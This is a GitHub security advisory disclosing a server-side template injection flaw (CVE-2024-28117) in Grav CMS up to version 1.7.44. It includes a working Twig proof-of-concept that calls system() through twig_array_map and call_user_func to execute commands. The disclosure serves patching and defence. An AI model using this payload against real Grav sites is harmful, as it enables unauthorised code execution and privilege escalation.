Skip to content

Server Side Template Injection (SSTI)

High
rhukster published GHSA-qfv4-q44r-g7rv Mar 21, 2024

Package

No package listed

Affected versions

<=1.7.44

Patched versions

1.7.45

Description

Summary

Grav validates accessible functions through the Utils::isDangerousFunction function, but does not impose restrictions on twig functions like twig_array_map, allowing attackers to bypass the validation and execute arbitrary commands.

Details

{{ grav.twig.twig.getFunction('twig_array_map')|var_dump }}

image

When we accessed twig_array_map like this, we confirmed that the twigFunction object is properly returned. Since the callable property is correctly included, we can access twig_array_map without any restrictions.

{% set cmd = {'id':'system'} %}
{{ twig_array_map(grav.twig.twig,cmd,'call_user_func')|join }}

Since there is no validation on twig_array_map itself, it is possible to call arbitrary function using call_user_func.

PoC

{% set cmd = {'id':'system'} %}
{{ twig_array_map(grav.twig.twig,cmd,'call_user_func')|join }}

Impact

Twig processing of static pages can be enabled in the front matter by any administrative user allowed to create or edit pages.
As the Twig processor runs unsandboxed, this behavior can be used to gain arbitrary code execution and elevate privileges on the instance.

Severity

High

CVE ID

CVE-2024-28117

Weaknesses

Credits